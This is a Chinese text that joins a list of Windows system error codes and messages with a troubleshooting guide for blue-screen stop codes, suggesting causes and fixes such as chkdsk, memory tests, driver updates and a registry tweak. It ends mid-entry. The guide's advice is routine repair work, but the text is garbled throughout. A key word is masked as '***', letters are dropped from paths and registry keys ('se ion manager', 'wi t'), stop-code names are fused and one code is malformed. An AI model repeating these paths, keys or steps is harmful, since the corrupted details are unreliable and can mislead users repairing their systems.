113 0x0071 没有可用的内部档案识别字。
114 0x0072 目标内部档案识别字不正确。
117 0x0075 由应用程式所执行的 ioctl 呼叫不正确。
118 0x0076 写入验证参数值不正确。
119 0x0077 系统不支援所要求的指令。
120 0x0078 此项功能仅在 win32 模式有效。
121 0x0079 semaphore 超过逾时期间。
122 0x007a 传到系统呼叫的资料区域 太小。
123 0x007b 档名、目录名称或储存体标签语法错误。
124 0x007c 系统呼叫层次不正确。
125 0x007d 磁碟没有设定标签。
126 0x007e 找不到指定的模组。
127 0x007f 找不到指定的程序。
128 0x0080 没有子行程可供等待。
129 0x0081 %1 这个应用程式无法在 win32 模式下执行。
130 0x0082 attempt to use a file handle to an open disk partition for an
operation other than raw disk i/o.
131 0x0083 尝试将档案指标移至档案开头之前。
132 0x0084 无法在指定的装置或档案,设定档案指标。
133 0x0085 join 或 su t 指令无法用于内含事先结合过的磁碟机。
134 0x0086 尝试在已经结合的磁碟机,使用 join 或 su t 指令。
135 0x0087 尝试在已经替换的磁碟机,使 用 join 或 su t 指令。
136 0x0088 系统尝试删除未连结过的磁碟机的连结关系。
137 0x0089 系统尝试删除未替换过的磁碟机的替换关系。
138 0x008a 系统尝试将磁碟机结合到已经结合过之磁碟机的目录。
139 0x008b 系统尝试将磁碟机替换成已经替换过之磁碟机的目录。
140 0x008c 系统尝试将磁碟机替换成已经替换过之磁碟机的目录。
141 0x008d 系统尝试将磁碟机 su t 成已结合的磁碟机目录。
142 0x008e 系统此刻无法执行 join 或 su t。
143 0x008f 系统无法将磁碟机结合或替换同一磁碟机下目录。
144 0x0090 这个目录不是根目录的子目录。
145 0x0091 目录仍有资料。
146 0x0092 指定的路径已经被替换过。
147 0x0093 资源不足,无法处理这项 指令。
148 0x0094 指定的路径这时候无法使用。
149 0x0095 尝试要结合或替换的磁碟机目录,是已经替换过的的目标。
150 0x0096 config.sys 档未指定系统追踪资讯,或是追踪功能被取消。
151 0x0097 指定的 semaphore事件 dosmuxsemwait 数目不正确。
152 0x0098 dosmuxsemwait 没有执行;设定太多的 semaphore。
153 0x0099 dosmuxsemwait 清单不正确。
154 0x009a 您所输入的储存媒体标 元长度限制。
155 0x009b 无法建立其他的执行绪
系统死机、蓝屏的解决方法!
系统死机、蓝屏破解
1、0x0000000A:IRQL_NOT_LESS_OR_EQUAL
◆错误分析:主要是由问题的驱动程序、有缺陷或不兼容的硬件与软件造成的. 从技术角度讲. 表明
在内核模式中存在以太高的进程内部请求级别(IRQL)访问其没有权限访问的内存地址.
◇解决方案:请用前面介绍的解决方案中的2、3、5、8、9方案尝试排除.
2、0x00000012:TRAP_CAUSE_UNKNOWN
◆错误分析:如果遇到这个错误信息, 那么很不幸, 应为KeBudCheck分析的结果是错误原因未知.
◇解决方案:既然微软都帮不上忙, 就得靠自己了, 请仔细回想这个错误是什么时候出现的; 第一次
发生时你对系统做了哪些操作; 发生时正在进行什么操作. 从这些信息中找出可能的原因, 从而选择相应
解决方案尝试排除.
3、0x0000001A:MEMORY_MANAGEMENT
◆错误分析:这个内存管理错误往往是由硬件引起的, 比如: 新***的硬件、内存本身有问题等.
◇解决方案:如果是在***Windows时出现, 有可能是由于你的电脑达不到***Windows的最小内存和
磁盘要求.
4、0x0000001E:KMODE_EXCEPTION_NOT_HANDLED
◆错误分析:Windows内核检查到一个非法或者未知的进程指令, 这个停机码一般是由问题的内存或是
与前面0x0000000A相似的原因造成的.
◇解决方案:
(1)硬件兼容有问题:请对照前面提到的最新硬件兼容性列表, 查看所有硬件是否包含在该列表中.
(2)有问题的设备驱动、系统服务或内存冲突和中断冲突: 如果在蓝屏信息中出现了驱动程序的名字,
请试着在***模式或者故障恢复控制台中禁用或删除驱动程序, 并禁用所有刚***的驱动和软件. 如果错
误出现在系统启动过程中, 请进入安全模式, 将蓝屏信息中所标明的文件重命名或者删除.
(3)如果错误信息中明确指出Win32K.sys: 很有可能是第三方远程控制软件造成的, 需要从故障恢复
控制台中将对该软件的服务关闭.
(4)在***Windows后第一次重启时出现:最大嫌疑可能时系统分区的磁盘空间不足或BIOS兼容有问题.
(5)如果是在关闭某个软件时出现的:很有可能时软件本省存在设计缺陷, 请升级或卸载它.
5、0x00000023:FAT_FILE_SYSTEM 0x00000024:NTFS_FILE_SYSTEM
◆错误分析:0x00000023通常发生在读写FAT16或者FAT32文件系统的系统分区时, 而0x00000024则是
由于NTFS.sys文件出现错误(这个驱动文件的作用是容许系统读写使用NTFS文件系统的磁盘). 这两个蓝屏错误很有可能是磁盘本身存在物理损坏, 或是中断要求封包(IRP)损坏而导致的. 其他原因还包括:硬盘磁盘碎片过多; 文件读写操作过于频繁, 并且数据量非常达或者是由于一些磁盘镜像软件或杀毒软件引起的
◇解决方案:
第一步:首先打开命令行提示符, 运行"Chkdsk /r"(注:不是CHKDISK, 感觉象这个, 但是……)命令检
查并修复硬盘错误, 如果报告存在怀道(Bad Track), 请使用硬盘厂商提供的检查工具进行检查和修复.
第二步:接着禁用所有即使扫描文件的软件, 比如:杀毒软件、防火墙或备份工具.
第三步:右击C:\wi t\system32\drivers\fastfat.sys文件并选择"属性", 查看其版本是否与当前系
统所使用的Windows版本相符.(注:如果是XP, 应该是C:\windows\system32\drivers\fastfat.sys)
第四步:***最新的主板驱动程序, 特别IDE驱动. 如果你的光驱、可移动存储器也提供有驱动程序,
最好将它们升级至最新版.
6、0x00000027:RDR_FILE_SYSTEM
◆错误分析:这个错误产生的原因很难判断, 不过Windows内存管理出了问题很可能会导致这个停机码
的出现.
◇解决方案:如果是内存管理的缘故, 通常增加内存会解决问题.
7、0x0000002EATA_BUS_ERROR
◆错误分析:系统内存存储器奇偶校验产生错误, 通常是因为有缺陷的内存(包括物理内存、二级缓存
或者显卡显存)时设备驱动程序访问不存在的内存地址等原因引起的. 另外, 硬盘被病毒或者其他问题所
损伤, 以出现这个停机码.
◇解决方案:
(1)检查病毒
(2)使用"chkdsk /r"命令检查所有磁盘分区.
(3)用Memtest86等内存测试软件检查内存.
(4)检查硬件是否正确***, 比如:是否牢固、金手指是否有污渍.
8、0x00000035:NO_MORE_IRP_STACK_LOCATIONS
◆错误分析:从字面上理解, 应该时驱动程序或某些软件出现堆栈问题. 其实这个故障的真正原因应
该时驱动程序本省存在问题, 或是内存有质量问题.
◇解决方案:请使用前面介绍的常规解决方案中与驱动程序和内存相关的方案进行排除.
9、0x0000003F:NO_MORE_SYSTEM_PTES
◆错误分析:一个与系统内存管理相关的错误, 比如:由于执行了大量的输入/输出操作, 造成内存管
理出现问题: 有缺陷的驱动程序不正确地使用内存资源; 某个应用程序(比如:备份软件)被分配了大量的
内核内存等.
◇解决方案:卸载所有最新***的软件(特别是哪些增强磁盘性能的应用程序和杀毒软件)和驱动程序.
10、0x00000044:MULTIPLE_IRP_COMPLIETE_REQUESTS
◆错误分析:通常是由硬件驱动程序引起的.
◇解决方案:卸载最近***的驱动程序. 这个故障很少出现, 目前已经知道的是, 在使用
http://www.in-system.com/这家公司的某些软件时会出现, 其中的罪魁就是Falstaff.sys文件.(作者难
道不怕吃官司嘛, 把公司网址公布)
11、0x00000050:PAGE_FAULT_IN_NONPAGED+AREA
◆错误分析:有问题的内存(包括屋里内存、二级缓存、显存)、不兼容的软件(主要是远程控制和杀毒
软件)、损坏的NTFS卷以及有问题的硬件(比如:PCI插卡本身已损坏)等都会引发这个错误.
◇解决方案:请使用前面介绍的常规解决方案中与内存、软件、硬件、硬盘等相关的方案进行排除.
12、0x00000051:REGISTRY_ERROR
◆错误分析:这个停机码说明注册表或系统配置管理器出现错误, 由于硬盘本身有物理损坏或文件系
统存在问题, 从而造成在读取注册文件时出现输入/输出错误.
◇解决方案:使用"chkdsk /r"检查并修复磁盘错误.
13、0x00000058:FTDISK_INTERNAL_ERROR
◆错误分析:说明在容错集的主驱动发生错误.
◇解决方案:首先尝试重启电脑看是否能解决问题, 如果不行, 则尝试"最后一次正确配置"进行解决.
14、0x0000005E:CRITICAL_SERVICE_FAILED
◆错误分析:某个非常重要的系统服务启动识别造成的.
◇解决方案:如果是在***了某个新硬件后出新的, 可以先移除该硬件, 并通过网上列表检查它是否
与Windows 2K/XP兼容, 接着启动电脑, 如果蓝屏还是出现, 请使用"最后一次正确配置"来启动Windows,
如果这样还是失败, 建议进行修复***或是重装.
15、0x0000006F:SESSION3_INITIALIZATION-FAILED
◆错误分析:这个错误通常出现在Windows启动时, 一般是由有问题的驱动程序或损坏的系统文件引起
◇解决方案:建议使用Windows***光盘对系统进行修复***.
16、0x00000076:PROCESS_HAS_LOCKED_PAGES
◆错误分析:通常是因为某个驱动程序在完成了一次输入/输出操作后, 没有正确释放所占有的内存
◇解决方案:
第一步:点击开始--运行:regedt32, 找到[HKLM\SYSTEM\Currentcontrol set\control\se ion
manager\memory management], 在右侧新建双字节值"TrackLockedPages", 值为1. 这样Windows便会在错误再次出现时跟踪到是哪个驱动程序的问题.
第二步:如果再次出现蓝屏, 那么错误信息会变成:
STOP:0x0000000CB(0xY,0xY,0xY,0xY)DRIVER_LEFT_LOCKED_PAGES_IN_PROCESS
其中第四个"0xY"会显示为问题驱动程序的名字, 接着对其进行更新或删除.
第三步:进入注册表, 删除添加的"TrackLockedPages".
17、0x00000077:KERNEL_STACK_INPAGE_ERROR
◆错误分析:说明需要使用的内核数据没有在虚拟内存或物理内存中找到. 这个错误常常于是着磁盘
有问题, 相应数据损坏或受到病毒侵蚀.
◇解决方案:使用杀毒软件扫描系统; 使用"chkdsk /r"命令检查并修复磁盘错误, 如不行则使用磁盘
厂商提供的工具检查修复.
18、0x0000007A:KERNEL_DATA_INPAGE_ERROR
◆错误分析:这个错误往往是虚拟内存中的内核数据无法读入内存造成的. 原因可能是虚拟内存页面
文件中存在坏簇、病毒、磁盘控制器出错、内存有问题.
◇解决方案:首先用升级为最新病毒库杀毒软件查杀病毒, 如果促无信息中还有0xC000009C或
0xC000016A代码, 那么表示是坏簇造成的, 并且系统的磁盘检测工具无法自动修复, 这时要进入"故障恢
复控制台", 用"chkdsk /r"命令进行手动修复.
19、0x0000007B:INACESSIBLE_BOOT_DEVICE
◆错误分析:Windows在启动过程中无法访问系统分区或启动卷. 一般发生在更换主板后第一次启动时
, 主要是因为新主板和旧主板的IDE控制器使用了不同芯片组造成的. 有时也可能是病毒或硬盘损伤所引
起的.
◇解决方案:一般只要用***光盘启动电脑, 然后执行修复***即可解决问题. 对于病毒则可使用DOS
版的杀毒软件进行查杀(主战有kv2005DOS版下载). 如果是硬盘本身存在问题, 请将其***到其他电脑中,
然后使用"chkdsk /r"来检查并修复磁盘错误.
20、0x0000007E:SYSTEM_THREAD_EXCEPTION_NOT_HANDLED
◆错误分析:系统进程产生错误, 但Windows错误处理器无法捕获. 其产生原因很多, 包括:硬件兼容
性、有问题的驱动程序或系统服务、或者是某些软件.
◇解决方案:请使用"事件查看器"来获取更多的信息, 从中发现错误根源.(发现好像不是解决哦, 看
来这里大家要自力更生了!)
21、0x0000007F:UNEXPECTED_KERNEL_MOED_TRAP
◆错误分析:一般是由于有问题的硬件(比如:内存)或某些软件引起的. 有时超频也会产生这个错误.
◇解决方案:用检测软件(比如:Memtest86)检查内存, 如果进行了超频, 请取消超频. 将PCI硬件插卡
从主板插槽拔下来, 或更换插槽. 另外, 有些主板(比如:nForce2主板)在进行超频后, 南桥芯片过热也会
导致蓝屏, 此时为该芯片单独增加散热片往往可以有效解决问题.
22、0x00000080:NMI_HARDWARE_FAILURE
◆错误分析:通常是有硬件引起的.(似乎蓝屏与硬件错误有不解之缘)
◇解决方案:如果最近***了新硬件, 请将其移除, 然后试试更换插槽和***最新的驱动程序, 如果
升级了驱动程序, 请恢复后原来的版本; 检查内存金手指是否有污染和损坏; 扫描病毒; 运行"chkdsk
/r"检查并修复磁盘错误; 检查所有硬件插卡已经插牢. 如果以上尝试都无效果, 就得找专业的电脑维修
公司请求帮助了.
23、0x0000008E:KERNEL_MODE_EXCEPTION_NOT_HANDLED
◆错误分析:内核级应用程序产生了错误, 但Windows错误处理器没有捕获. 通常是硬件兼容性错误.
◇解决方案:升级驱动程序或升级BIOS.
24、0x0000009C:MACHINE_CHECK_EXCEPTION
◆错误分析:通常是硬件引起的. 一般是因为超频或是硬件存在问题(内存、CPU、总线、电源).
◇解决方案:如果进行了超频, 请降会CPU原来频率, 检查硬件.
25、0x0000009FRIVER_POWER_STATE_FAILURE
◆错误分析:往往与电源有关系, 常常发生在与电源相关的操作, 比如:关机、待机或休睡.
◇解决方案:重装系统, 如果不能解决, 请更换电源.
26、0x000000A5:ACPI_BIOS_ERROR
◆错误分析:通常是因为主板BIOS不能全面支持ACPI规范.
◇解决方案:如果没有相应BIOS升级, 那么可在***Windows 2K/XP时, 当出现"pre F6 if you
need to i tall a third-party SCSI or RAID driver"提示时, 按下F7键, 这样Windows便会自动禁止
***ACPI HAL, 而*** Standard PC HAL.
27、0x000000B4:VIDEO_DRIVER_INIT_FAILURE
◆错误分析:这个停止信息表示Windows因为不能启动显卡驱动, 从而无法进入图
